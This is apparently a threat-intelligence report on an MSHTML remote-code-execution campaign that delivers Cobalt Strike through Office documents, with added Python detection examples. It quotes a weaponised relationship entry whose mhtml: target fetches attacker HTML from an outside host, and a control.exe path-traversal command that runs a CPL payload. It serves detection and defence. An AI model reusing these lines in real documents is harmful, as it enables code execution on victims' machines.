Overview

MSHTML (Microsoft HTML), also known as Trident, is the browser engine Microsoft developed for Internet Explorer. Microsoft Office can host MSHTML to render HTML content, and threat actors are abusing this to gain code execution on targeted systems. The attacker crafts a malicious ActiveX control together with a Microsoft Office document that loads the browser rendering engine, then persuades the victim to open the document, which triggers a logic flaw in MSHTML. These malicious documents are delivered via Office 365. By default, documents downloaded from the Internet open in Protected View or Application Guard for Office, both of which block this attack. If the user leaves Protected View (for example by clicking Enable Editing), the remote content is fetched, the target machine is exploited, and a malware agent such as a Cobalt Strike Beacon is deployed. Microsoft Defender for Endpoint has been updated to flag such attacks with the alert "Suspicious Cpl File Execution". Given the quality of the vulnerability research and the scale at which users are being targeted, an advanced adversary is most likely behind the ongoing campaign. The CloudSEK Threat Intelligence Research team obtained malicious artifacts to extract the TTPs (Tactics, Techniques, and Procedures) of the adversaries leveraging the MSHTML RCE bug, in order to better protect our clients. This report provides a technical analysis of the campaign. Specifics of the exploit have been intentionally withheld to avoid misuse in the public domain, as a large number of systems remain susceptible.
Remote Template Injection Technique

Microsoft Word and Excel documents (.docx, .xlsx) are ZIP archives of XML parts that hold the content and metadata the user created in the corresponding Office application. In simple terms, a document can be unzipped to reveal its internal XML files. The directory word\_rels in an unzipped Word document (xl\_rels for Excel) plays a significant role in weaponizing a seemingly benign file: the _rels directories store relationship metadata, including the template the document fetches when Office loads it. By pointing such a relationship at an SMB share or HTTP URL under the attacker's control, Office can be made to fetch and execute a malicious payload. To hunt for the remote template injection vector, search the .rels parts for <Relationship> elements whose TargetMode attribute is set to "External" and inspect the value of their Target attribute for a malicious URL. Office downloads the file that this URL points to when the document is opened.
The document.xml.rels part of the weaponised document; rId6 is the external oleObject relationship whose mhtml: Target fetches the attacker's HTML:

```xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Target="theme/theme1.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Id="rId8"/>
  <Relationship Target="webSettings.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Id="rId3"/>
  <Relationship Target="fontTable.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Id="rId7"/>
  <Relationship Target="settings.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Id="rId2"/>
  <Relationship Target="styles.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Id="rId1"/>
  <Relationship Target="mhtml:http://hidusi.com/e8c76295a5f9acb7/side.html!x-usc:http://hidusi.com/e8c76295a5f9acb7/side.html" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Id="rId6" TargetMode="External"/>
  <Relationship Target="media/image2.wmf" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId5"/>
  <Relationship Target="media/image1.jpeg" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId4"/>
</Relationships>
```
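The search described above (unzip the package, walk every .rels part, pull out <Relationship> elements with TargetMode="External", and triage their Target) can be automated. The scanner below is an added example written for this page, not CloudSEK tooling or code from the campaign. It builds a minimal .docx in memory whose document.xml.rels reuses the mhtml: oleObject Target quoted above; the settings.xml.rels part, its attachedTemplate URL (templates.example.invalid) and the hyperlink are constructed for illustration, and the verdict labels are this example's own choice. It generalises slightly beyond the page by also flagging the classic attachedTemplate form of remote template injection.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"

# Relationship types Office resolves on its own when the document is opened.
# A hyperlink is also External, but it is only fetched when the user clicks it.
FETCHED_ON_OPEN = {"attachedTemplate", "oleObject"}
REMOTE_PREFIXES = ("http://", "https://", "file:", "\\\\")


def external_relationships(package_bytes):
    """Return (part, rId, short type, Target) for every <Relationship> with
    TargetMode="External" in any .rels part of an OOXML package."""
    found = []
    with zipfile.ZipFile(io.BytesIO(package_bytes)) as zf:
        for part in zf.namelist():
            if not part.lower().endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(part))
            for rel in root.iter(REL_NS + "Relationship"):
                if rel.get("TargetMode", "Internal") != "External":
                    continue
                short_type = rel.get("Type", "").rsplit("/", 1)[-1]
                found.append((part, rel.get("Id"), short_type, rel.get("Target", "")))
    return found


def verdict(short_type, target):
    """Triage one external relationship by what Word does with it on open."""
    t = target.strip().lower()
    if t.startswith("mhtml:"):
        return "malicious"    # mhtml: handler pulls mshtml.dll into WINWORD.EXE
    if short_type in FETCHED_ON_OPEN and t.startswith(REMOTE_PREFIXES):
        return "suspicious"   # remote template / OLE object fetched without a click
    return "info"             # e.g. an ordinary hyperlink


def scan(package_bytes):
    """Scan a .docx/.xlsx given as bytes; returns (part, rId, type, target, verdict)."""
    return [(part, rid, typ, target, verdict(typ, target))
            for part, rid, typ, target in external_relationships(package_bytes)]


# --- constructed sample package (not a real document from the campaign) -----
# document.xml.rels reuses the mhtml: Target from the rels part quoted above;
# the settings.xml.rels part and its template URL are made up for illustration.
DOCUMENT_RELS = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>
  <Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="mhtml:http://hidusi.com/e8c76295a5f9acb7/side.html!x-usc:http://hidusi.com/e8c76295a5f9acb7/side.html" TargetMode="External"/>
  <Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.example.com/" TargetMode="External"/>
</Relationships>"""

SETTINGS_RELS = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="http://templates.example.invalid/t.dotm" TargetMode="External"/>
</Relationships>"""


def build_sample_package():
    """Minimal in-memory .docx: only the parts this scanner looks at are real."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/_rels/document.xml.rels", DOCUMENT_RELS)
        zf.writestr("word/_rels/settings.xml.rels", SETTINGS_RELS)
    return buf.getvalue()


if __name__ == "__main__":
    for part, rid, typ, target, v in scan(build_sample_package()):
        print(f"{v:10s} {part} {rid} {typ}: {target}")
```

To run it against a real sample, pass `open("suspect.docx", "rb").read()` to `scan()`. Internal relationships (styles.xml and friends) never appear in the output, so on a benign document the list is usually empty or contains only hyperlinks.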
Cobalt Strike Beacon

Basic static analysis shows that the 'championship.inf' file is in fact a 64-bit DLL (Dynamic Link Library): it begins with the "MZ" magic bytes of a PE (Portable Executable) image. A CPL file is a Control Panel item, and it carries executable code. A DLL becomes a CPL when it exports a function named 'CPlApplet'; control.exe (through rundll32.exe and shell32.dll's Control_RunDLL) loads the library and calls that export, so the file runs like any other PE regardless of its .inf extension. Windows Defender flags it as "Trojan:Win32/Agent.SA", and other security solutions flag it as "Trojan.Win64.COBEACON.SUZ".
Dynamic Analysis of the Exploit

When the exploit successfully triggers the vulnerability and gains remote code execution, the payload it deploys is the Cobalt Strike Beacon discussed above. CloudSEK researchers recreated the exploit and ran it to better understand the vulnerability, using Process Monitor to trace the execution flow of the Office document in WINWORD.EXE. A few of the interesting findings are shared below.
Loading of the Vulnerable Module

Microsoft Word loads mshtml.dll from the Windows system directory; the vulnerability resides in one of the functions this DLL implements. Based on CloudSEK's testing, mshtml.dll is not loaded into WINWORD.EXE by default. When the attacker delivers an exploit written in HTML via remote template injection, the Target of the external <Relationship> uses the mhtml: protocol handler, which causes Word to load the mshtml module to render the HTML page inside the document.
File Writing

The final payload, championship.inf, is extracted from the initial ministry.cab archive and written to the Temp directory. This is probably the result of the vulnerability adversaries abuse to write user-controlled data to disk.
Code Execution

CloudSEK researchers also identified multiple control.exe processes spawned to execute the CPL payload. Each of these processes searches for the championship.inf file in directories hardcoded in the exploit. Here is a list of the hardcoded directories to which the payload is dropped.
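The two behaviours reported in this and the previous section (mshtml.dll appearing inside WINWORD.EXE, and control.exe launched under Word to run a .cpl/.inf payload) translate directly into detection logic. The code below is an added example for this page, not CloudSEK's or Microsoft's detection content. The process and image-load events are constructed records in a shape invented here (not the Sysmon or Process Monitor schema); the control.exe command line is modelled on the CPL launch pattern described above but is not a captured log line, and the PIDs and the invoice.docx file name are made up.

```python
import re
from collections import namedtuple

# Constructed event shapes for this example (not Sysmon's or Procmon's schema).
Proc = namedtuple("Proc", "pid ppid image cmdline")
Load = namedtuple("Load", "pid image module")

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
CPL_RUNNERS = {"control.exe", "rundll32.exe"}
PAYLOAD_EXT = re.compile(r"\.(cpl|inf)\b", re.I)
USER_WRITABLE = re.compile(r"\\(AppData\\Local\\Temp|Users\\[^\\]+|ProgramData|Windows\\Temp)\\", re.I)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def office_ancestor(proc, by_pid, max_hops=3):
    """Walk up the parent chain: control.exe hands off to rundll32.exe, so the
    Office process may sit two hops above the one that actually runs the CPL."""
    parent = by_pid.get(proc.ppid)
    for _ in range(max_hops):
        if parent is None:
            return None
        if basename(parent.image) in OFFICE_APPS:
            return parent
        parent = by_pid.get(parent.ppid)
    return None


def suspicious_cpl_launches(events):
    """Return [(pid, [reasons])] for CPL runners launched from an Office app."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        name = basename(e.image)
        if name not in CPL_RUNNERS:
            continue
        # rundll32 is only interesting when it is running a Control Panel item
        if name == "rundll32.exe" and "control_rundll" not in e.cmdline.lower():
            continue
        cmd = e.cmdline.replace("/", "\\")       # normalise .cpl:../../ style paths
        if not PAYLOAD_EXT.search(cmd):
            continue
        office = office_ancestor(e, by_pid)
        if office is None:
            continue
        reasons = ["spawned under " + basename(office.image)]
        if USER_WRITABLE.search(cmd):
            reasons.append("payload in user-writable directory")
        if "..\\" in cmd:
            reasons.append("path traversal in .cpl: argument")
        hits.append((e.pid, reasons))
    return hits


def office_loading_mshtml(loads):
    """PIDs of Office processes that loaded mshtml.dll (not loaded by default)."""
    return sorted({l.pid for l in loads
                   if basename(l.image) in OFFICE_APPS and basename(l.module) == "mshtml.dll"})


# --- constructed sample telemetry -------------------------------------------
WINWORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
EVENTS = [
    Proc(1000, 800, r"C:\Windows\explorer.exe", "explorer.exe"),
    Proc(4100, 1000, WINWORD, '"' + WINWORD + '" /n "C:\\Users\\alice\\Downloads\\invoice.docx"'),
    Proc(4320, 4100, r"C:\Windows\System32\control.exe",
         r'"C:\Windows\System32\control.exe" ".cpl:../../../AppData/Local/Temp/championship.inf"'),
    Proc(4330, 4320, r"C:\Windows\System32\rundll32.exe",
         r'"C:\Windows\System32\rundll32.exe" Shell32.dll,Control_RunDLL ".cpl:../../../AppData/Local/Temp/championship.inf"'),
    # benign: a user opening a Control Panel applet from Explorer
    Proc(5200, 1000, r"C:\Windows\System32\control.exe",
         r'"C:\Windows\System32\control.exe" /name Microsoft.NetworkAndSharingCenter'),
]
LOADS = [
    Load(4100, WINWORD, r"C:\Windows\System32\mshtml.dll"),
    Load(1000, r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshtml.dll"),
]

if __name__ == "__main__":
    for pid, reasons in suspicious_cpl_launches(EVENTS):
        print(pid, "; ".join(reasons))
    print("Office PIDs that loaded mshtml.dll:", office_loading_mshtml(LOADS))
```

The parent-chain walk matters: the rundll32.exe that finally executes the CPL is a grandchild of WINWORD.EXE, so a rule that only checks the immediate parent misses it. The benign control.exe launched from Explorer is dropped both because its parent is not an Office application and because its command line names no .cpl or .inf file.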
Guidelines

Based on the official guidelines posted by Microsoft, Windows users need to follow the instructions given below:
- Disable ActiveX via Group Policy
- Disable ActiveX on individual systems via registry
- Disable shell preview in Windows Explorer
- Enterprise customers who manage updates should ensure their Microsoft Defender detection build is 1.349.22.0 or newer
Indicators of Compromise (IOCs)